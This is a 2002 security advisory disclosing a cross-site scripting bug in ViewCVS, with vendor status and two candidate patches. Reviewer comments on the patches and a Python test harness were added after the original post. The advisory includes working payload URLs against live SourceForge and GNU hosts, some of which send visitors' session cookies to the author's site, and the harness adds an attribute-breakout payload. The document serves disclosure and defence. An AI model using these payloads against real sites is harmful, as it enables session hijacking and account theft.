OSEC

 
From: office (officeoffice.ac)
Date: Sat May 18 2002 - 19:32:24 CDT


    ViewCVS: cross-site scripting bug

    I found the following cross-site scripting vulnerability in ViewCVS:

    Details
    ------------
    Product: ViewCVS
    Affected Version: 0.9.2 and earlier
    Vendor's URL: http://viewcvs.sourceforge.net/
    Vendor Status: Informed. The ViewCVS team has already fixed it internally,
                   but nothing has been published.

    Introduction
    ------------
    ViewCVS is a WWW interface for CVS repositories. It is widely used in
    the free software and open source communities. Unfortunately, it is
    vulnerable to cross-site scripting.

    Proof
    -----------------
    If you request a URL like the following:

    http://target_site/cgi-bin/viewcvs.cgi/viewcvs/?cvsroot=>alert("hello")</script>
    http://target_site/cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev"><script>alert("hello")</script>

    The former URL works in Internet Explorer 6.0 and Opera 6.01, but not
    in Netscape 4.78, Netscape 6.2.2 or Mozilla 0.9.9 on Windows XP.
    All these URLs do is make a popup window appear.

    Example
    -----------------
    For example, you can see the vulnerability at SourceForge.net
    (the vendor's site is hosted on SourceForge.net).

    If you access the sample URLs below, your cookie (including your
    login information and session information for SourceForge.net)
    is stolen by my site (http://www.office.ac).

    The stolen cookie from Internet Explorer 6.0 includes your login
    information and session information for SourceForge.net. But the
    stolen cookie from Opera 6.01 and Mozilla 0.9.9 includes only the
    user name, and Netscape 4.78 and 6.2.2 send no cookie at all.
    (I don't know why.)

    http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/viewcvs/?cvsroot=>alert("ALERT:%20Now,%20your%20cookie%20about%20sourceforge.net%20is%20stolen%20by%20www.office.ac");window.open('http://www.office.ac/j.cgi?'%2Bdocument.cookie);</script>
    http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev"><script>alert("ALERT:%20Now,%20your%20cookie%20about%20sourceforge.net%20is%20stolen%20by%20www.office.ac");window.open('http://www.office.ac/j.cgi?'%2Bdocument.cookie);</script>

    The ViewCVS installation at SourceForge.net is not the newest version.
    The vulnerability in the newest version of ViewCVS can be seen at GNU:

    http://subversions.gnu.org/cgi-bin/viewcvs/?cvsroot=>alert("hello")</script>
    http://subversions.gnu.org/cgi-bin/viewcvs/cvs-utils/CVSROOT/?sortby=rev"><script>alert("hello")</script>

    Vendor status
    --------------
    The vendor was notified on 13 Mar 2002 and 26 Mar 2002.

    I heard the following:
    Some Japanese hackers (contributors to SourceForge.jp and the
    Hyper NIKKI System Project) proposed a patch to the ViewCVS team
    in April, but the ViewCVS team rejected it. The ViewCVS team said
    they had fixed it on April 1st.
    But nothing has been published by the ViewCVS team since.

    Patch
    --------------
    Two patches are below. I got these patches by a non-safe method,
    so I am not sure that their code is completely the same as the original.
    And I do not understand code or programming at all,
    so I take no responsibility for these patches.

    One was made by Kenji Suzuki <kenjipo.ganseki.ne.jp> / Hyper
    NIKKI System Project (http://www.h14m.org/).
    I heard it has been applied to the web pages of the Hyper
    NIKKI System Project and SourceForge.jp.

    --- viewcvs.py.orig Fri Dec 14 23:14:39 2001
    +++ viewcvs.py Sun Mar 31 15:24:34 2002
    -172,7 +172,7
         # parse the query params into a dictionary (and use defaults)
         query_dict = default_settings.copy()
         for name, values in cgi.parse().items():
    - query_dict[name] = values[0]
    + query_dict[name] = cgi.escape(values[0])
     
         # set up query strings, prefixed by question marks and ampersands
         query = sticky_query(query_dict)
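Review bot: cgi.escape(values[0]) is called with its default quote=False, so " and ' pass through unchanged; a value such as rev" onmouseover="... still breaks out of a double-quoted attribute even though < and > are now encoded. Pass quote=True (and note that even then cgi.escape does not touch '). Escaping at parse time also means every value, including those handed to sticky_query to rebuild URLs, now carries &amp;, &lt; and &gt; entities; the escape belongs at the point of HTML output, where the context (text, attribute, URL) is known.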

    I heard the other patch was made by the ViewCVS team. I got this code
    from Taku YASUI <tachsourceforge.jp> / SourceForge.jp
    (http://sourceforge.jp/), who had proposed the former patch to the
    ViewCVS team.

    ===================================================================
    RCS file: /cvsroot/viewcvs/viewcvs/lib/viewcvs.py,v
    retrieving revision 1.107
    retrieving revision 1.108
    diff -u -r1.107 -r1.108
    --- viewcvs/viewcvs/lib/viewcvs.py 2002/02/22 09:20:46 1.107
    +++ viewcvs/viewcvs/lib/viewcvs.py 2002/04/01 01:32:16 1.108
    -180,8 +180,14
     
         # parse the query params into a dictionary (and use defaults)
         query_dict = default_settings.copy()
    +
    + # RE that ViewCVS doesn't use in any URL, but a CSS attack might
    + re_url_validate = re.compile('\'|"|<|>')
         for name, values in cgi.parse().items():
    - query_dict[name] = values[0]
    + # do not accept values that contain non-ViewCVS characters
    + # except for search
    + if not re.search(re_url_validate, values[0]) or name == 'search':
    + query_dict[name] = values[0]
     
         # set up query strings, prefixed by question marks and ampersands
         query = sticky_query(query_dict)
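Review bot: the name == 'search' exception in the if condition lets a search value containing ', ", < or > into query_dict untouched, and nothing in this hunk escapes it, so if that value is ever echoed into the page the cross-site scripting bug simply moves to the search parameter. Escape search at output time rather than exempting it from the check. A rejected value is also dropped silently, leaving the entry from default_settings in place, so the client gets no indication that its request was altered; consider reporting the rejected parameter. Finally, re_url_validate is a denylist of four characters tied to the current output contexts; output-time escaping would not need to be maintained as new contexts are added.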

    --
    office
    officeukky.net
    officeoffice.ac
    http://www.office.ac/
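The two patches take different approaches: the first HTML-escapes every query value as it is parsed, the second rejects values containing ' " < > except for the search parameter. As an added example (not code from the advisory or from the ViewCVS project), the Python below rebuilds query_dict the way each hunk does, using urllib.parse.parse_qs and html.escape as stand-ins for cgi.parse() and cgi.escape(), reflects the values into a hypothetical page fragment, and runs the advisory's two proof payloads plus a constructed attribute-breakout payload through each. The default settings, the fragment's markup and the injected() check are assumptions made for the example.

```python
import html
import re
from urllib.parse import parse_qs

# Stand-ins for ViewCVS's default_settings (assumed names; not the project's code).
DEFAULT_SETTINGS = {"cvsroot": "Main", "sortby": "file", "search": ""}

# The same four characters the second patch's re_url_validate rejects.
RE_URL_VALIDATE = re.compile("['\"<>]")


def parse_query(query_string, mode):
    """Build query_dict the way each approach on the page does.

    mode == "raw":      original behaviour, values copied unchanged (vulnerable)
    mode == "escape":   first patch, cgi.escape(values[0]) with its default quote=False
    mode == "validate": second patch, drop values containing ' " < > unless name == 'search'
    """
    query_dict = dict(DEFAULT_SETTINGS)
    # urllib's parse_qs stands in for the cgi.parse() call in the hunks.
    for name, values in parse_qs(query_string, keep_blank_values=True).items():
        value = values[0]
        if mode == "raw":
            query_dict[name] = value
        elif mode == "escape":
            # html.escape(s, quote=False) does what cgi.escape(s) did: only & < > change.
            query_dict[name] = html.escape(value, quote=False)
        elif mode == "validate":
            if not RE_URL_VALIDATE.search(value) or name == "search":
                query_dict[name] = value
        else:
            raise ValueError("unknown mode: %s" % mode)
    return query_dict


def render(query_dict, escape_on_output=False):
    """Hypothetical page fragment (not ViewCVS's real markup): cvsroot and search
    are echoed as text, sortby lands inside a double-quoted attribute."""
    def out(s):
        # quote=True also turns " into &quot; and ' into &#x27;, so a value can
        # neither close a tag nor break out of a quoted attribute.
        return html.escape(s, quote=True) if escape_on_output else s

    return (
        "<p>Repository: %s</p>\n"
        '<a href="viewcvs.cgi/?sortby=%s">sort by</a>\n'
        "<p>Search: %s</p>"
        % (out(query_dict["cvsroot"]), out(query_dict["sortby"]), out(query_dict["search"]))
    )


# Payloads: the two from the advisory, plus two constructed ones
# (an attribute breakout that needs no < or >, and one aimed at the search exemption).
PAYLOAD_CVSROOT = 'cvsroot=>alert("hello")</script>'
PAYLOAD_SORTBY = 'sortby=rev"><script>alert("hello")</script>'
PAYLOAD_ATTR = "sortby=rev%22%20onmouseover=%22alert(1)"
PAYLOAD_SEARCH = "search=<script>alert(1)</script>"


def injected(page):
    """True if the fragment still carries a live script tag or an attribute breakout."""
    return re.search(r"</?script", page) is not None or 'rev" onmouseover' in page


if __name__ == "__main__":
    for mode in ("raw", "escape", "validate"):
        for qs in (PAYLOAD_CVSROOT, PAYLOAD_SORTBY, PAYLOAD_ATTR, PAYLOAD_SEARCH):
            page = render(parse_query(qs, mode))
            print("%-9s %-45s injected=%s" % (mode, qs, injected(page)))
    page = render(parse_query(PAYLOAD_ATTR, "raw"), escape_on_output=True)
    print("%-9s %-45s injected=%s" % ("output", PAYLOAD_ATTR, injected(page)))
```

Running it shows the trade-offs the two hunks make: escape-on-parse with quote=False stops both advisory payloads but lets the attribute-breakout value through untouched; the character denylist stops all three sortby/cvsroot payloads by silently replacing them with the defaults, yet passes the search payload straight into the page; escaping with quote=True at the point of output neutralises every one of them regardless of which parameter carried it.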